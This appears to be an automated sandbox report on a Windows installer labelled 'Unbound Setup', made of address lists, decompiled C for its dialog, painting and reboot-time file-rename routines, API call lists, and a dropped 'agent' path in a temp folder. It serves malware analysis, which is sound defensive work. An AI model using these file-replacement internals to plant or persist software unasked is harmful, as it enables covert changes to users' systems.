                                                                                                                                    0x00403fc5
                                                                                                                                    0x00403fc5
                                                                                                                                    0x00403fcf
                                                                                                                                    0x00403fe1
                                                                                                                                    0x00403fed
                                                                                                                                    0x00403ff2
                                                                                                                                    0x00403ffc
                                                                                                                                    0x00404002
                                                                                                                                    0x00404004
                                                                                                                                    0x00404009
                                                                                                                                    0x00404006
                                                                                                                                    0x00404006
                                                                                                                                    0x00404006
                                                                                                                                    0x00404019
                                                                                                                                    0x00404031
                                                                                                                                    0x00404033
                                                                                                                                    0x00404039
                                                                                                                                    0x0040404e
                                                                                                                                    0x0040403b
                                                                                                                                    0x00404044
                                                                                                                                    0x00404046
                                                                                                                                    0x00404046
                                                                                                                                    0x00404054
                                                                                                                                    0x00404065
                                                                                                                                    0x00404076
                                                                                                                                    0x0040407d
                                                                                                                                    0x00404087
                                                                                                                                    0x0040408c
                                                                                                                                    0x0040408e
                                                                                                                                    0x00000000
                                                                                                                                    0x00404094
                                                                                                                                    0x00404094
                                                                                                                                    0x00404096
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040409c
                                                                                                                                    0x004040a0
                                                                                                                                    0x004040c5
                                                                                                                                    0x004040cb
                                                                                                                                    0x004040d1
                                                                                                                                    0x004040d3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040f9
                                                                                                                                    0x004040ff
                                                                                                                                    0x00404101
                                                                                                                                    0x00404106
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040410c
                                                                                                                                    0x0040410f
                                                                                                                                    0x00404112
                                                                                                                                    0x00404129
                                                                                                                                    0x00404135
                                                                                                                                    0x0040414e
                                                                                                                                    0x00404158
                                                                                                                                    0x0040415d
                                                                                                                                    0x00404163
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040416d
                                                                                                                                    0x00404178
                                                                                                                                    0x00000000
                                                                                                                                    0x00404178
                                                                                                                                    0x004040a2
                                                                                                                                    0x004040a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040ae
                                                                                                                                    0x004040b4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004040ba
                                                                                                                                    0x0040408e
                                                                                                                                    0x00404185
                                                                                                                                    0x00404191
                                                                                                                                    0x00404198
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ee8
                                                                                                                                    0x00403ee8
                                                                                                                                    0x00403eeb
                                                                                                                                    0x00403f1e
                                                                                                                                    0x00403f1e
                                                                                                                                    0x00403f20
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f20
                                                                                                                                    0x00403ef1
                                                                                                                                    0x00403ef6
                                                                                                                                    0x00403ef8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f08
                                                                                                                                    0x00403f10
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f16
                                                                                                                                    0x00403d44
                                                                                                                                    0x00403d44
                                                                                                                                    0x00403d48
                                                                                                                                    0x00403d4d
                                                                                                                                    0x00403d5c
                                                                                                                                    0x00403d5c
                                                                                                                                    0x00403d65
                                                                                                                                    0x00403d6e
                                                                                                                                    0x00403d79
                                                                                                                                    0x00403d79
                                                                                                                                    0x00403d85
                                                                                                                                    0x00403da1
                                                                                                                                    0x00403da4
                                                                                                                                    0x00403db7
                                                                                                                                    0x00403dbd
                                                                                                                                    0x00403e60
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e69
                                                                                                                                    0x00403dc3
                                                                                                                                    0x00403dd0
                                                                                                                                    0x00403dd2
                                                                                                                                    0x00403dd4
                                                                                                                                    0x00403df3
                                                                                                                                    0x00403df3
                                                                                                                                    0x00403df6
                                                                                                                                    0x00403dfb
                                                                                                                                    0x00403dfe
                                                                                                                                    0x00403e0e
                                                                                                                                    0x00403e0f
                                                                                                                                    0x00403e11
                                                                                                                                    0x00403e47
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e5a
                                                                                                                                    0x00403e13
                                                                                                                                    0x00403e19
                                                                                                                                    0x00403e32
                                                                                                                                    0x00403e37
                                                                                                                                    0x00403e39
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e3b
                                                                                                                                    0x00403e27
                                                                                                                                    0x00403e27
                                                                                                                                    0x00403e29
                                                                                                                                    0x00403e29
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e29
                                                                                                                                    0x00403e1c
                                                                                                                                    0x00403e21
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e21
                                                                                                                                    0x00403e00
                                                                                                                                    0x00403e06
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e08
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e08

                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5C
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403D79
                                                                                                                                    • DestroyWindow.USER32 ref: 00403D8D
                                                                                                                                    • SetWindowLongA.USER32 ref: 00403DA9
                                                                                                                                    • GetDlgItem.USER32 ref: 00403DCA
                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403DDE
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403DE5
                                                                                                                                    • GetDlgItem.USER32 ref: 00403E93
                                                                                                                                    • GetDlgItem.USER32 ref: 00403E9D
                                                                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403EB7
                                                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403F08
                                                                                                                                    • GetDlgItem.USER32 ref: 00403FAE
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403FCF
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403FE1
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403FFC
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404012
                                                                                                                                    • EnableMenuItem.USER32 ref: 00404019
                                                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404031
                                                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404044
                                                                                                                                    • lstrlenA.KERNEL32(0042A898,?,0042A898,00000000), ref: 0040406E
                                                                                                                                    • SetWindowTextA.USER32(?,0042A898), ref: 0040407D
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                    • Opcode ID: c7c6e4d3dd8260ed78c6c5d463d2d5f6b7f322b843d7e68da7b759b855b3d578
                                                                                                                                    • Instruction ID: f1583ae769777d8160d41959bcba43e0d90a98f60c39713831340626624adfa9
                                                                                                                                    • Opcode Fuzzy Hash: c7c6e4d3dd8260ed78c6c5d463d2d5f6b7f322b843d7e68da7b759b855b3d578
                                                                                                                                    • Instruction Fuzzy Hash: 20C1D371600205ABDB216F62ED89E2B3ABDFB94305F40053EF651B51F1CB799882DB2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E0040435F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _v16;
                                                                                                                                    				struct HWND__* _t52;
                                                                                                                                    				long _t86;
                                                                                                                                    				int _t98;
                                                                                                                                    				struct HWND__* _t99;
                                                                                                                                    				signed int _t100;
                                                                                                                                    				signed int _t106;
                                                                                                                                    				intOrPtr _t107;
                                                                                                                                    				intOrPtr _t109;
                                                                                                                                    				int _t110;
                                                                                                                                    				signed int* _t112;
                                                                                                                                    				signed int _t113;
                                                                                                                                    				char* _t114;
                                                                                                                                    				CHAR* _t115;
                                                                                                                                    
                                                                                                                                    				if(_a8 != 0x110) {
                                                                                                                                    					__eflags = _a8 - 0x111;
                                                                                                                                    					if(_a8 != 0x111) {
                                                                                                                                    						L11:
                                                                                                                                    						__eflags = _a8 - 0x4e;
                                                                                                                                    						if(_a8 != 0x4e) {
                                                                                                                                    							__eflags = _a8 - 0x40b;
                                                                                                                                    							if(_a8 == 0x40b) {
                                                                                                                                    								 *0x429864 =  *0x429864 + 1;
                                                                                                                                    								__eflags =  *0x429864;
                                                                                                                                    							}
                                                                                                                                    							L25:
                                                                                                                                    							_t110 = _a16;
                                                                                                                                    							L26:
                                                                                                                                    							return E0040425B(_a8, _a12, _t110);
                                                                                                                                    						}
                                                                                                                                    						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                    						_t110 = _a16;
                                                                                                                                    						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                                                                                                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                                                                                                    							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                                                                                                    							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                    								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                    								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                    								_v12 = _t100;
                                                                                                                                    								__eflags = _t100 - _t109 - 0x800;
                                                                                                                                    								_v16 = _t109;
                                                                                                                                    								_v8 = 0x42e3c0;
                                                                                                                                    								if(_t100 - _t109 < 0x800) {
                                                                                                                                    									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                    									SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                    									_push(1);
                                                                                                                                    									E00404603(_a4, _v8);
                                                                                                                                    									SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                    									_t110 = _a16;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                                                                                                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                                                                                                    							goto L26;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                                                                                                    							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                    								goto L26;
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                    								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                    								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                                                                                                    							}
                                                                                                                                    							return 1;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					__eflags = _a12 >> 0x10;
                                                                                                                                    					if(_a12 >> 0x10 != 0) {
                                                                                                                                    						goto L25;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *0x429864; // 0x0
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						goto L25;
                                                                                                                                    					}
                                                                                                                                    					_t112 =  *0x42a070 + 0x14;
                                                                                                                                    					__eflags =  *_t112 & 0x00000020;
                                                                                                                                    					if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                    						goto L25;
                                                                                                                                    					}
                                                                                                                                    					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                    					__eflags = _t106;
                                                                                                                                    					 *_t112 = _t106;
                                                                                                                                    					E00404216(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                    					E004045DF();
                                                                                                                                    					goto L11;
                                                                                                                                    				} else {
                                                                                                                                    					_t98 = _a16;
                                                                                                                                    					_t113 =  *(_t98 + 0x30);
                                                                                                                                    					if(_t113 < 0) {
                                                                                                                                    						_t107 =  *0x42ebfc; // 0x671d5f
                                                                                                                                    						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                    					}
                                                                                                                                    					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                    					_t114 = _t113 +  *0x42f478;
                                                                                                                                    					_push(0x22);
                                                                                                                                    					_a16 =  *_t114;
                                                                                                                                    					_v12 = _v12 & 0x00000000;
                                                                                                                                    					_t115 = _t114 + 1;
                                                                                                                                    					_v16 = _t115;
                                                                                                                                    					_v8 = E0040432A;
                                                                                                                                    					E004041F4(_a4);
                                                                                                                                    					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                    					_push(0x23);
                                                                                                                                    					E004041F4(_a4);
                                                                                                                                    					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                    					E00404216( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                    					_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                    					E00404229(_t99);
                                                                                                                                    					SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                    					_t86 =  *( *0x42f434 + 0x68);
                                                                                                                                    					if(_t86 < 0) {
                                                                                                                                    						_t86 = GetSysColor( ~_t86);
                                                                                                                                    					}
                                                                                                                                    					SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                    					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                    					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                    					 *0x429864 = 0;
                                                                                                                                    					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                                    					 *0x429864 = 0;
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    			}




















                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004043EA
                                                                                                                                    • GetDlgItem.USER32 ref: 004043FE
                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040441C
                                                                                                                                    • GetSysColor.USER32(?), ref: 0040442D
                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040443C
                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040444B
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040444E
                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040445D
                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404472
                                                                                                                                    • GetDlgItem.USER32 ref: 004044D4
                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004044D7
                                                                                                                                    • GetDlgItem.USER32 ref: 00404502
                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404542
                                                                                                                                    • LoadCursorA.USER32 ref: 00404551
                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040455A
                                                                                                                                    • LoadCursorA.USER32 ref: 00404570
                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404573
                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040459F
                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004045B3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                    • String ID: *C@$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$N
                                                                                                                                    • API String ID: 3103080414-171159700
                                                                                                                                    • Opcode ID: 0d3c02828e62e51ff56bf2943b0875dd3b902087131927a6b6dbeb2ed3138fdb
                                                                                                                                    • Instruction ID: fd893e278ef90fe5302b154ae5e2864ac3785098f99c53dfadd838e99d83cf4e
                                                                                                                                    • Opcode Fuzzy Hash: 0d3c02828e62e51ff56bf2943b0875dd3b902087131927a6b6dbeb2ed3138fdb
                                                                                                                                    • Instruction Fuzzy Hash: 5C61A2B1A00209BFEB10AF61DD45F6A3BA9FB84714F00453AFB057A1D1C7B8A951CF98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                    				struct tagLOGBRUSH _v16;
                                                                                                                                    				struct tagRECT _v32;
                                                                                                                                    				struct tagPAINTSTRUCT _v96;
                                                                                                                                    				struct HDC__* _t70;
                                                                                                                                    				struct HBRUSH__* _t87;
                                                                                                                                    				struct HFONT__* _t94;
                                                                                                                                    				long _t102;
                                                                                                                                    				signed int _t126;
                                                                                                                                    				struct HDC__* _t128;
                                                                                                                                    				intOrPtr _t130;
                                                                                                                                    
                                                                                                                                    				if(_a8 == 0xf) {
                                                                                                                                    					_t130 =  *0x42f434;
                                                                                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                    					_a8 = _t70;
                                                                                                                                    					GetClientRect(_a4,  &_v32);
                                                                                                                                    					_t126 = _v32.bottom;
                                                                                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                    					while(_v32.top < _t126) {
                                                                                                                                    						_a12 = _t126 - _v32.top;
                                                                                                                                    						asm("cdq");
                                                                                                                                    						asm("cdq");
                                                                                                                                    						asm("cdq");
                                                                                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                    						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                                                                                    						_a16 = _t87;
                                                                                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                                                                                    						DeleteObject(_a16);
                                                                                                                                    						_v32.top = _v32.top + 4;
                                                                                                                                    					}
                                                                                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                    						_a16 = _t94;
                                                                                                                                    						if(_t94 != 0) {
                                                                                                                                    							_t128 = _a8;
                                                                                                                                    							_v32.left = 0x10;
                                                                                                                                    							_v32.top = 8;
                                                                                                                                    							SetBkMode(_t128, 1);
                                                                                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                                                                                    							DrawTextA(_t128, "Unbound Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                                    							SelectObject(_t128, _a8);
                                                                                                                                    							DeleteObject(_a16);
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					EndPaint(_a4,  &_v96);
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				_t102 = _a16;
                                                                                                                                    				if(_a8 == 0x46) {
                                                                                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                                                                                                    				}
                                                                                                                                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                    			}














                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextA.USER32(00000000,Unbound Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F$Unbound Setup
                                                                                                                                    • API String ID: 941294808-863422241
                                                                                                                                    • Opcode ID: 5dfc0a365ae6646cd7cf79038b101edce8fbc994cd9983f08dbb808245b03f20
                                                                                                                                    • Instruction ID: b542f919fab398636142f3c5daf315cc403a9a3a4e76b50810c965540b20923a
                                                                                                                                    • Opcode Fuzzy Hash: 5dfc0a365ae6646cd7cf79038b101edce8fbc994cd9983f08dbb808245b03f20
                                                                                                                                    • Instruction Fuzzy Hash: 1D418C71400209AFCB058FA5DE459BFBBB9FF44314F00842EF5A1AA1A0CB74A955DFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405DD5(void* __ecx) {
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				long _t12;
                                                                                                                                    				long _t24;
                                                                                                                                    				char* _t31;
                                                                                                                                    				int _t37;
                                                                                                                                    				void* _t38;
                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                    				long _t42;
                                                                                                                                    				CHAR* _t44;
                                                                                                                                    				void* _t46;
                                                                                                                                    				void* _t48;
                                                                                                                                    				void* _t49;
                                                                                                                                    				void* _t52;
                                                                                                                                    				void* _t53;
                                                                                                                                    
                                                                                                                                    				_t38 = __ecx;
                                                                                                                                    				_t44 =  *(_t52 + 0x14);
                                                                                                                                    				 *0x42c628 = 0x4c554e;
                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                    					L3:
                                                                                                                                    					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca28, 0x400);
                                                                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                    						_t37 = wsprintfA(0x42c228, "%s=%s\r\n", 0x42c628, 0x42ca28);
                                                                                                                                    						_t53 = _t52 + 0x10;
                                                                                                                                    						E00406188(_t37, 0x400, 0x42ca28, 0x42ca28,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                                                                                                    						_t12 = E00405CFF(0x42ca28, 0xc0000000, 4);
                                                                                                                                    						_t48 = _t12;
                                                                                                                                    						 *(_t53 + 0x18) = _t48;
                                                                                                                                    						if(_t48 != 0xffffffff) {
                                                                                                                                    							_t42 = GetFileSize(_t48, 0);
                                                                                                                                    							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                    							if(_t46 == 0 || E00405D77(_t48, _t46, _t42) == 0) {
                                                                                                                                    								L18:
                                                                                                                                    								return CloseHandle(_t48);
                                                                                                                                    							} else {
                                                                                                                                    								if(E00405C64(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                    									_t49 = E00405C64(_t38, _t21 + 0xa, 0x40a3d0);
                                                                                                                                    									if(_t49 == 0) {
                                                                                                                                    										_t48 =  *(_t53 + 0x18);
                                                                                                                                    										L16:
                                                                                                                                    										_t24 = _t42;
                                                                                                                                    										L17:
                                                                                                                                    										E00405CBA(_t24 + _t46, 0x42c228, _t37);
                                                                                                                                    										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                    										E00405DA6(_t48, _t46, _t42 + _t37);
                                                                                                                                    										GlobalFree(_t46);
                                                                                                                                    										goto L18;
                                                                                                                                    									}
                                                                                                                                    									_t39 = _t46 + _t42;
                                                                                                                                    									_t31 = _t39 + _t37;
                                                                                                                                    									while(_t39 > _t49) {
                                                                                                                                    										 *_t31 =  *_t39;
                                                                                                                                    										_t31 = _t31 - 1;
                                                                                                                                    										_t39 = _t39 - 1;
                                                                                                                                    									}
                                                                                                                                    									_t24 = _t49 - _t46 + 1;
                                                                                                                                    									_t48 =  *(_t53 + 0x18);
                                                                                                                                    									goto L17;
                                                                                                                                    								}
                                                                                                                                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                    								_t42 = _t42 + 0xa;
                                                                                                                                    								goto L16;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					CloseHandle(E00405CFF(_t44, 0, 1));
                                                                                                                                    					_t12 = GetShortPathNameA(_t44, 0x42c628, 0x400);
                                                                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                    						goto L3;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t12;
                                                                                                                                    			}



















                                                                                                                                    0x00405e06
                                                                                                                                    0x00405e0f
                                                                                                                                    0x00405e13
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e13
                                                                                                                                    0x00405f44

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F66,?,?), ref: 00405E06
                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042C628,00000400), ref: 00405E0F
                                                                                                                                      • Part of subcall function 00405C64: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C74
                                                                                                                                      • Part of subcall function 00405C64: lstrlenA.KERNEL32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA6
                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA28,00000400), ref: 00405E2C
                                                                                                                                    • wsprintfA.USER32 ref: 00405E4A
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA28,C0000000,00000004,0042CA28,?,?,?,?,?), ref: 00405E85
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E94
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ECC
                                                                                                                                    • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042C228,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405F22
